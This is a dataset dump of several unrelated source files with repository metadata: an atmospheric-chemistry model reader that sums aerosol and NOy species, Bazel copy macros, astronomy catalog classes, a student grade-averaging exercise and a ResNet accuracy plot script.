# This is only revevant if var_list is provided
if var_list is not None:
if bool(list_remove_extra_only): # confirm list not empty
dset = dset.drop_vars(list_remove_extra_only)
return dset
def _get_keys(d):
"""Calculates keys
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
list
list of keys
"""
keys = Series([i for i in d.data_vars.keys()])
return keys
def add_lazy_pm25(d, dict_sum):
"""Calculates PM2.5 sum. 20% of coarse mode is included in PM2.5 sum.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new PM2.5 calculation
"""
keys = _get_keys(d)
allvars = Series(
concatenate([dict_sum["aitken"], dict_sum["accumulation"], dict_sum["coarse"]])
)
weights = Series(
concatenate(
[
np.ones(len(dict_sum["aitken"])),
np.ones(len(dict_sum["accumulation"])),
np.full(len(dict_sum["coarse"]), 0.2),
]
)
)
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
newweights = weights.loc[index]
d["PM25"] = add_multiple_lazy2(d, newkeys, weights=newweights)
d["PM25"] = d["PM25"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "PM2.5",
"long_name": "PM2.5 calculated by MONET assuming coarse mode 20%",
}
)
return d
def add_lazy_pm10(d, dict_sum):
"""Calculates PM10 sum.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new PM10 calculation
"""
keys = _get_keys(d)
allvars = Series(
concatenate([dict_sum["aitken"], dict_sum["accumulation"], dict_sum["coarse"]])
)
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
d["PM10"] = add_multiple_lazy2(d, newkeys)
d["PM10"] = d["PM10"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "PM10",
"long_name": "Particulate Matter < 10 microns",
}
)
return d
def add_lazy_noy_g(d, dict_sum):
"""Calculates NOy gas
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NOy gas calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["noy_gas"])
weights = Series(dict_sum["noy_gas_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
newweights = weights.loc[index]
d["noy_gas"] = add_multiple_lazy2(d, newkeys, weights=newweights)
d["noy_gas"] = d["noy_gas"].assign_attrs({"name": "noy_gas", "long_name": "NOy gases"})
return d
def add_lazy_noy_a(d, dict_sum):
"""Calculates NOy aerosol
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NOy aerosol calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["noy_aer"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
d["noy_aer"] = add_multiple_lazy2(d, newkeys)
d["noy_aer"] = d["noy_aer"].assign_attrs(
{"units": r"$\mu g m^{-3}$", "name": "noy_aer", "long_name": "NOy aerosol"}
)
return d
def add_lazy_nox(d, dict_sum):
"""Calculates NOx
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NOx calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["nox"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
d["nox"] = add_multiple_lazy2(d, newkeys)
d["nox"] = d["nox"].assign_attrs({"name": "nox", "long_name": "nox"})
return d
def add_lazy_cl_pm25(d, dict_sum):
"""Calculates sum of particulate Cl.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new CLf calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_cl"])
weights = Series(dict_sum["pm25_cl_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_cl"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_cl"] = d["pm25_cl"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_cl",
"long_name": "PM2.5 CL assuming coarse mode 20%",
}
)
return d
def add_lazy_ec_pm25(d, dict_sum):
"""Calculates sum of particulate EC.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new EC calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_ec"])
weights = Series(dict_sum["pm25_ec_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_ec"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_ec"] = d["pm25_ec"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_ec",
"long_name": "PM2.5 EC assuming coarse mode 20%",
}
)
return d
def add_lazy_ca_pm25(d, dict_sum):
"""Calculates sum of particulate CA.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new CA calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_ca"])
weights = Series(dict_sum["pm25_ca_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_ca"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_ca"] = d["pm25_ca"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_ca",
"long_name": "PM2.5 CA assuming coarse mode 20%",
}
)
return d
def add_lazy_na_pm25(d, dict_sum):
"""Calculates sum of particulate NA.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NA calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_na"])
weights = Series(dict_sum["pm25_na_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_na"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_na"] = d["pm25_na"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_na",
"long_name": "PM2.5 NA assuming coarse mode 20%",
}
)
return d
def add_lazy_nh4_pm25(d, dict_sum):
"""Calculates sum of particulate NH4.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NH4 calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_nh4"])
weights = Series(dict_sum["pm25_nh4_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_nh4"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_nh4"] = d["pm25_nh4"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_nh4",
"long_name": "PM2.5 NH4 assuming coarse mode 20%",
}
)
return d
def add_lazy_no3_pm25(d, dict_sum):
"""Calculates sum of particulate NO3.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NO3 calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_no3"])
weights = Series(dict_sum["pm25_no3_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_no3"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_no3"] = d["pm25_no3"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_no3",
"long_name": "PM2.5 NO3 assuming coarse mode 20%",
}
)
return d
def add_lazy_so4_pm25(d, dict_sum):
"""Calculates sum of particulate SO4.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new SO4 calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_so4"])
weights = Series(dict_sum["pm25_so4_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_so4"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_so4"] = d["pm25_so4"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_so4",
"long_name": "PM2.5 SO4 assuming coarse mode 20%",
}
)
return d
def add_lazy_om_pm25(d, dict_sum):
"""Calculates sum of particulate OM.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new OM calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_om"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
d["pm25_om"] = add_multiple_lazy2(d, newkeys)
d["pm25_om"] = d["pm25_om"].assign_attrs(
{"units": r"$\mu g m^{-3}$", "name": "pm25_om", "long_name": "PM2.5 OM"}
)
return d
def add_multiple_lazy(dset, variables, weights=None):
"""Sums variables
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
variables : series
series of variables
variables : series
series of weights to apply to each variable during the sum
Returns
-------
xarray.Dataarray
Weighted sum of all specified variables
"""
from numpy import ones
if weights is None:
weights = ones(len(variables))
else:
weights = weights.values
variables = variables.values
new = dset[variables[0]].copy() * weights[0]
for i, j in zip(variables[1:], weights[1:]):
new = new + dset[i] * j
return new
def add_multiple_lazy2(dset, variables, weights=None):
"""Sums variables. This is similar to add_multiple_lazy, but is a little
faster.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
variables : series
series of variables
variables : series
series of weights to apply to each variable during the sum
Returns
-------
xarray.Dataarray
Weighted sum of all specified variables
"""
dset2 = dset[variables.values]
if weights is not None:
for i, j in zip(variables.values, weights.values):
dset2[i] = dset2[i] * j
new = dset2.to_array().sum("variable")
return new
def _predefined_mapping_tables(dset):
"""Predefined mapping tables for different observational parings used when
combining data.
Returns
-------
dictionary
dictionary defining default mapping tables
"""
to_improve = {}
to_nadp = {}
to_aqs = {
"OZONE": ["o3"],
"PM2.5": ["PM25"],
"CO": ["co"],
"NOY": ["NOy"],
"NOX": ["NOx"],
"SO2": ["so2"],
"NO": ["no"],
"NO2": ["no2"],
}
to_airnow = {
"OZONE": ["o3"],
"PM2.5": ["PM25"],
"CO": ["co"],
"NOY": ["NOy"],
"NOX": ["NOx"],
"SO2": ["so2"],
"NO": ["no"],
"NO2": ["no2"],
}
to_crn = {}
to_aeronet = {}
to_cems = {}
mapping_tables = {
"improve": to_improve,
"aqs": to_aqs,
"airnow": to_airnow,
"crn": to_crn,
"cems": to_cems,
"nadp": to_nadp,
"aeronet": to_aeronet,
}
dset = dset.assign_attrs({"mapping_tables": mapping_tables})
return dset
# For the different mechanisms, just update these arrays as needed.
def dict_species_sums(mech):
"""Predefined mapping tables for different observational parings used when
combining data.
Parameters
----------
mech : string
mechanism name
Returns
-------
dictionary
dictionary defining the variables to sum based on the specified mechanism
"""
if mech == "cb6r3_ae6_aq":
sum_dict = {}
# Arrays for different gasses and pm groupings
sum_dict.update(
{
"accumulation": [
"aso4j",
"ano3j",
"anh4j",
"anaj",
"aclj",
"aecj",
"aothrj",
"afej",
"asij",
"atij",
"acaj",
"amgj",
"amnj",
"aalj",
"akj",
"alvpo1j",
"asvpo1j",
"asvpo2j",
"asvpo3j",
"aivpo1j",
"axyl1j",
"axyl2j",
"axyl3j",
"atol1j",
"atol2j",
"atol3j",
"abnz1j",
"abnz2j",
"abnz3j",
"aiso1j",
"aiso2j",
"aiso3j",
"atrp1j",
"atrp2j",
"asqtj",
"aalk1j",
"aalk2j",
"apah1j",
"apah2j",
"apah3j",
"aorgcj",
"aolgbj",
"aolgaj",
"alvoo1j",
"alvoo2j",
"asvoo1j",
"asvoo2j",
"asvoo3j",
"apcsoj",
]
}
)
sum_dict.update(
{
"accumulation_wopc": [
"aso4j",
"ano3j",
"anh4j",
"anaj",
"aclj",
"aecj",
"aothrj",
"afej",
"asij",
"atij",
"acaj",
"amgj",
"amnj",
"aalj",
"akj",
"alvpo1j",
"asvpo1j",
"asvpo2j",
"asvpo3j",
"aivpo1j",
"axyl1j",
"axyl2j",
"axyl3j",
"atol1j",
"atol2j",
"atol3j",
"abnz1j",
"abnz2j",
"abnz3j",
"aiso1j",
"aiso2j",
"aiso3j",
"atrp1j",
"atrp2j",
"asqtj",
"aalk1j",
"aalk2j",
"apah1j",
"apah2j",
"apah3j",
"aorgcj",
"aolgbj",
"aolgaj",
"alvoo1j",
"alvoo2j",
"asvoo1j",
"asvoo2j",
"asvoo3j",
]
}
)
sum_dict.update(
{
"aitken": [
"aso4i",
"ano3i",
"anh4i",
"anai",
"acli",
"aeci",
"aothri",
"alvpo1i",
"asvpo1i",
"asvpo2i",
"alvoo1i",
"alvoo2i",
"asvoo1i",
"asvoo2i",
]
}
)
sum_dict.update(
{"coarse": ["asoil", "acors", "aseacat", "aclk", "aso4k", "ano3k", "anh4k"]}
)
sum_dict.update(
{
"noy_gas": [
"no",
"no2",
"no3",
"n2o5",
"hono",
"hno3",
"pna",
"cron",
"clno2",
"pan",
"panx",
"opan",
"ntr1",
"ntr2",
"intr",
]
}
)
sum_dict.update({"noy_gas_weight": [1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]})
sum_dict.update(
{"noy_aer": ["ano3i", "ano3j", "ano3k"]}
) # Need to confirm here if there is a size cutoff for noy obs?
sum_dict.update({"nox": ["no", "no2"]})
sum_dict.update({"pm25_cl": ["acli", "aclj", "aclk"]})
sum_dict.update({"pm25_cl_weight": [1, 1, 0.2]})
sum_dict.update({"pm25_ec": ["aeci", "aecj"]})
sum_dict.update({"pm25_ec_weight": [1, 1]})
sum_dict.update({"pm25_na": ["anai", "anaj", "aseacat", "asoil", "acors"]})
sum_dict.update({"pm25_na_weight": [1, 1, 0.2 * 0.8373, 0.2 * 0.0626, 0.2 * 0.0023]})
sum_dict.update({"pm25_ca": ["acaj", "aseacat", "asoil", "acors"]})
sum_dict.update({"pm25_ca_weight": [1, 0.2 * 0.0320, 0.2 * 0.0838, 0.2 * 0.0562]})
sum_dict.update({"pm25_nh4": ["anh4i", "anh4j", "anh4k"]})
sum_dict.update({"pm25_nh4_weight": [1, 1, 0.2]})
sum_dict.update({"pm25_no3": ["ano3i", "ano3j", "ano3k"]})
sum_dict.update({"pm25_no3_weight": [1, 1, 0.2]})
sum_dict.update({"pm25_so4": ["aso4i", "aso4j", "aso4k"]})
sum_dict.update({"pm25_so4_weight": [1, 1, 0.2]})
sum_dict.update(
{
"pm25_om": [
"alvpo1i",
"asvpo1i",
"asvpo2i",
"alvoo1i",
"alvoo2i",
"asvoo1i",
"asvoo2i",
"alvpo1j",
"asvpo1j",
"asvpo2j",
"asvpo3j",
"aivpo1j",
"axyl1j",
"axyl2j",
"axyl3j",
"atol1j",
"atol2j",
"atol3j",
"abnz1j",
"abnz2j",
"abnz3j",
"aiso1j",
"aiso2j",
"aiso3j",
"atrp1j",
"atrp2j",
"asqtj",
"aalk1j",
"aalk2j",
"apah1j",
"apah2j",
"apah3j",
"aorgcj",
"aolgbj",
"aolgaj",
"alvoo1j",
"alvoo2j",
"asvoo1j",
"asvoo2j",
"asvoo3j",
"apcsoj",
]
}
)
else:
raise NotImplementedError(
"Mechanism not supported, update _rrfs_cmaq_mm.py file in MONETIO"
)
return sum_dict
def _calc_hgt(f):
"""Calculates the geopotential height in m from the variables hgtsfc and
delz. Note: To use this function the delz value needs to go from surface
to top of atmosphere in vertical. Because we are adding the height of
each grid box these are really grid top values
Parameters
----------
f : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xr.DataArray
Geoptential height with attributes.
"""
sfc = f.surfalt_m.load()
dz = f.dz_m.load() * -1.0
# These are negative in RRFS-CMAQ, but you resorted and are adding from the surface,
# so make them positive.
dz[:, 0, :, :] = dz[:, 0, :, :] + sfc # Add the surface altitude to the first model level only
z = dz.rolling(z=len(f.z), min_periods=1).sum()
z.name = "alt_msl_m_full"
z.attrs["long_name"] = "Altitude MSL Full Layer in Meters"
z.attrs["units"] = "m"
return z
def _calc_pressure(dset):
"""Calculate the mid-layer pressure in Pa from surface pressure
and ak and bk constants.
Interface pressures are calculated by:
phalf(k) = a(k) + surfpres * b(k)
Mid layer pressures are calculated by:
pfull(k) = (phalf(k+1)-phalf(k))/log(phalf(k+1)/phalf(k))
Parameters
----------
dset : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.DataArray
Mid-layer pressure with attributes.
"""
pres = dset.dp_pa.copy().load() # Have to load into memory here so can assign levels.
srfpres = dset.surfpres_pa.copy().load()
for k in range(len(dset.z)):
pres_2 = dset.ak[k + 1] + srfpres * dset.bk[k + 1]
pres_1 = dset.ak[k] + srfpres * dset.bk[k]
pres[:, k, :, :] = (pres_2 - pres_1) / np.log(pres_2 / pres_1)
pres.name = "pres_pa_mid"
pres.attrs["units"] = "pa"
pres.attrs["long_name"] = "Pressure Mid Layer in Pa"
return pres
| 29.569356
| 112
| 0.508079
| 3,742
| 32,615
| 4.261358
| 0.14217
| 0.03029
| 0.034115
| 0.042142
| 0.538568
| 0.486266
| 0.452402
| 0.420544
| 0.390129
| 0.332372
| 0
| 0.034159
| 0.369891
| 32,615
| 1,102
| 113
| 29.596189
| 0.741764
| 0.252123
| 0
| 0.451237
| 0
| 0
| 0.164185
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032023
| false
| 0
| 0.007278
| 0
| 0.07278
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fc818c5836435c92ae4ef2d17b3e1e01d7c0fde
| 816
|
bzl
|
Python
|
build/build.bzl
|
abaer123/gitlab-agent
|
71c94d781ae2a7ae2851bb946c37fe01b1ed3da0
|
[
"MIT"
] | null | null | null |
build/build.bzl
|
abaer123/gitlab-agent
|
71c94d781ae2a7ae2851bb946c37fe01b1ed3da0
|
[
"MIT"
] | null | null | null |
build/build.bzl
|
abaer123/gitlab-agent
|
71c94d781ae2a7ae2851bb946c37fe01b1ed3da0
|
[
"MIT"
] | null | null | null |
load("@com_github_atlassian_bazel_tools//multirun:def.bzl", "command")
load("@bazel_skylib//lib:shell.bzl", "shell")
def copy_to_workspace(name, label, file_to_copy, workspace_relative_target_directory):
command(
name = name,
command = "//build:copy_to_workspace",
data = [label],
arguments = ["$(rootpaths %s)" % label, file_to_copy, workspace_relative_target_directory],
visibility = ["//visibility:public"],
)
# This macro expects target directory for the file as an additional command line argument.
def copy_absolute(name, label, file_to_copy):
command(
name = name,
command = "//build:copy_absolute",
data = [label],
arguments = ["$(rootpaths %s)" % label, file_to_copy],
visibility = ["//visibility:public"],
)
| 37.090909
| 99
| 0.658088
| 95
| 816
| 5.389474
| 0.421053
| 0.070313
| 0.085938
| 0.117188
| 0.488281
| 0.443359
| 0.322266
| 0.322266
| 0.167969
| 0
| 0
| 0
| 0.207108
| 816
| 21
| 100
| 38.857143
| 0.791345
| 0.107843
| 0
| 0.444444
| 0
| 0
| 0.282369
| 0.172176
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fc9836cfddecb88f1956951f281f1c8d40b8f81
| 4,471
|
py
|
Python
|
CAAPR/CAAPR_AstroMagic/PTS/pts/magic/catalog/catalog.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 7
|
2016-05-20T21:56:39.000Z
|
2022-02-07T21:09:48.000Z
|
CAAPR/CAAPR_AstroMagic/PTS/pts/magic/catalog/catalog.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 1
|
2019-03-21T16:10:04.000Z
|
2019-03-22T17:21:56.000Z
|
CAAPR/CAAPR_AstroMagic/PTS/pts/magic/catalog/catalog.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 1
|
2020-05-19T16:17:17.000Z
|
2020-05-19T16:17:17.000Z
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.magic.catalog.catalog Contains the GalacticCatalog and StellarCatalog classes.
# -----------------------------------------------------------------
# Ensure Python 3 functionality
from __future__ import absolute_import, division, print_function
# Import the relevant PTS classes and modules
from ..tools import catalogs
from ...core.tools import introspection, tables
from ...core.tools import filesystem as fs
# -----------------------------------------------------------------
catalogs_user_path = fs.join(introspection.pts_user_dir, "catalogs")
# -----------------------------------------------------------------
class GalacticCatalog(object):
"""
This class ...
"""
def __init__(self, frame_or_wcs):
"""
The constructor ...
:param frame_or_wcs:
:return:
"""
# Create the catalogs user directory if necessary
if not fs.is_directory(catalogs_user_path): fs.create_directory(catalogs_user_path)
# Determine the path to the 'galaxies' catalog path
galaxies_catalog_path = fs.join(catalogs_user_path, "galaxies")
# Create the catalogs/galaxies directory is necessary
if not fs.is_directory(galaxies_catalog_path): fs.create_directory(galaxies_catalog_path)
# Get the center coordinate and the range of RA and DEC
center, ra_span, dec_span = frame_or_wcs.coordinate_range
# Generate a unique string for the coordinate range
name = str(center) + "_" + str(ra_span) + "_" + str(dec_span)
# Determine the path to the catalog file
self.path = fs.join(galaxies_catalog_path, name + ".cat")
# Check whether the local file exists
if not fs.is_file(self.path):
# Get the table
self.table = catalogs.create_galaxy_catalog(frame_or_wcs)
# Save the table
tables.write(self.table, self.path, format="ascii.ecsv")
# Load the table
else: self.table = tables.from_file(self.path, format="ascii.ecsv")
# -----------------------------------------------------------------
def saveto(self, path):
"""
This function ...
:param path:
:return:
"""
tables.write(self.table, path, format="ascii.ecsv")
# -----------------------------------------------------------------
class StellarCatalog(object):
"""
This class ...
"""
def __init__(self, frame_or_wcs, catalog_names="II/246"):
"""
This function ...
:param frame_or_wcs:
:param catalog_names:
:return:
"""
# Create the catalogs user directory if necessary
if not fs.is_directory(catalogs_user_path): fs.create_directory(catalogs_user_path)
# Determine the path to the 'galaxies' catalog path
stars_catalog_path = fs.join(catalogs_user_path, "stars")
# Create the catalogs/stars directory is necessary
if not fs.is_directory(stars_catalog_path): fs.create_directory(stars_catalog_path)
# Get the center coordinate and the range of RA and DEC
center, ra_span, dec_span = frame_or_wcs.coordinate_range
# Generate a unique string for the coordinate range
name = str(center) + "_" + str(ra_span) + "_" + str(dec_span)
# Determine the path to the catalog file
self.path = fs.join(stars_catalog_path, name + ".cat")
# Check whether the local file exists
if not fs.is_file(self.path):
# Get the table
self.table = catalogs.create_star_catalog(frame_or_wcs, catalog_names)
# Save the table
tables.write(self.table, self.path, format="ascii.ecsv")
# Load the table
else: self.table = tables.from_file(self.path, format="ascii.ecsv")
# -----------------------------------------------------------------
def saveto(self, path):
"""
This function ...
:param path:
:return:
"""
tables.write(self.table, path, format="ascii.ecsv")
# -----------------------------------------------------------------
| 31.485915
| 97
| 0.547976
| 482
| 4,471
| 4.887967
| 0.219917
| 0.046689
| 0.033956
| 0.02292
| 0.702037
| 0.663837
| 0.663837
| 0.635823
| 0.603565
| 0.573005
| 0
| 0.001465
| 0.236636
| 4,471
| 141
| 98
| 31.70922
| 0.688544
| 0.426303
| 0
| 0.484848
| 0
| 0
| 0.042416
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121212
| false
| 0
| 0.121212
| 0
| 0.30303
| 0.030303
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fcda78cf21f154d5256341e1d4f6994551d5ce9
| 858
|
py
|
Python
|
exercicio9.py
|
isaacfelipe1/Estrutura_De_Dados_Um_UEA
|
79b693d186154b54b7bb0c2dac10cd4cf9886bb3
|
[
"Apache-2.0"
] | null | null | null |
exercicio9.py
|
isaacfelipe1/Estrutura_De_Dados_Um_UEA
|
79b693d186154b54b7bb0c2dac10cd4cf9886bb3
|
[
"Apache-2.0"
] | null | null | null |
exercicio9.py
|
isaacfelipe1/Estrutura_De_Dados_Um_UEA
|
79b693d186154b54b7bb0c2dac10cd4cf9886bb3
|
[
"Apache-2.0"
] | null | null | null |
#9-Faça um programa que leia um número indeterminado de notas. Após esta entrada de dados, faça seguinte:
#. Mostre a quantidade de notas que foram lidas.
#. Exiba todas as notas na ordem em que foram informadas.
#. Calcule e mostre a média das notas.
#. Calcule e mostre a quantidade de notas acima da média calculada.
list=[]
acima_media=[]
notas=float(input("Informe suas notas(-1 para sair\n"))
while(notas>=0):
list.append(notas)
notas=float(input("Informe suas notas(-1 para sair\n"))
media=sum(list)/len(list)
for i, word in enumerate(list):
if word>media:
acima_media+=[word]
soma=len(acima_media)
print('na posição',i,'foi digitado o número ',word)
print(f' A quantidades de notas que foram informados: {len(list)}')
print()
print('=>'*30)
print(f'A média das notas foi {media}')
print(f'{soma}')
print(acima_media)
| 35.75
| 105
| 0.708625
| 141
| 858
| 4.283688
| 0.460993
| 0.046358
| 0.056291
| 0.062914
| 0.215232
| 0.135762
| 0.135762
| 0.135762
| 0.135762
| 0.135762
| 0
| 0.008345
| 0.162005
| 858
| 24
| 106
| 35.75
| 0.831711
| 0.361305
| 0
| 0.111111
| 0
| 0
| 0.354779
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.388889
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fcf633d461876ef2ed0512751ad534119c618aa
| 1,249
|
py
|
Python
|
src/resnet_datasize_plot.py
|
chloechsu/nanoparticle
|
5e78fe33c2d562aa31d5e458be0dbf52813f20b1
|
[
"MIT"
] | 1
|
2021-04-04T23:07:59.000Z
|
2021-04-04T23:07:59.000Z
|
src/resnet_datasize_plot.py
|
chloechsu/nanoparticle
|
5e78fe33c2d562aa31d5e458be0dbf52813f20b1
|
[
"MIT"
] | null | null | null |
src/resnet_datasize_plot.py
|
chloechsu/nanoparticle
|
5e78fe33c2d562aa31d5e458be0dbf52813f20b1
|
[
"MIT"
] | 3
|
2021-01-13T14:50:42.000Z
|
2022-03-20T16:19:52.000Z
|
import argparse
import csv
import glob
import os
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
sns.set()
shapes = ['TriangPrismIsosc', 'parallelepiped', 'sphere', 'wire']
def main():
trainsizes = []
avg_acc = []
for f in glob.glob('model/resnet18-all-Adam-lr_0.0001*_test_metrics.csv'):
if 'joint' in f or 'nofeature' in f:
continue
print(f)
trainsize = f.split('-')[4]
assert trainsize.startswith('trainsize')
if int(trainsize[10:]) in trainsizes:
print(trainsize[10:])
trainsizes.append(int(trainsize[10:]))
df = pd.read_csv(f)
avg_acc.append(np.mean([df.iloc[0]['accuracy/' + s] for s in shapes]))
aug_ratio = [int((t - 7950.) / 7950.) for t in trainsizes]
print(aug_ratio)
hues = [str(t == 19) for t in aug_ratio]
plt.figure(figsize=(8, 5))
ax = sns.scatterplot(x=aug_ratio[::-1], y=avg_acc[::-1], marker='+',
hue=hues[::-1], s=80)
ax.legend_.remove()
plt.xlabel('Data Augmentation Ratio', fontsize=15)
plt.ylabel('ResNet18-1D Top-1 Accuracy', fontsize=15)
plt.savefig('plots/resnet18_datasize_plot.png')
if __name__ == "__main__":
main()
| 29.046512
| 78
| 0.622898
| 178
| 1,249
| 4.247191
| 0.522472
| 0.042328
| 0.037037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.043254
| 0.222578
| 1,249
| 42
| 79
| 29.738095
| 0.735324
| 0
| 0
| 0
| 0
| 0
| 0.171337
| 0.066453
| 0
| 0
| 0
| 0
| 0.027778
| 1
| 0.027778
| false
| 0
| 0.222222
| 0
| 0.25
| 0.083333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fd0efe4c22b97942030348d8ad7858091215264
| 1,482
|
py
|
Python
|
pyramid_bootstrap/__init__.py
|
keitheis/pyramid_bootstrap
|
e8d6e8b9081427bca264d16a679571c35d3527e5
|
[
"BSD-3-Clause"
] | null | null | null |
pyramid_bootstrap/__init__.py
|
keitheis/pyramid_bootstrap
|
e8d6e8b9081427bca264d16a679571c35d3527e5
|
[
"BSD-3-Clause"
] | null | null | null |
pyramid_bootstrap/__init__.py
|
keitheis/pyramid_bootstrap
|
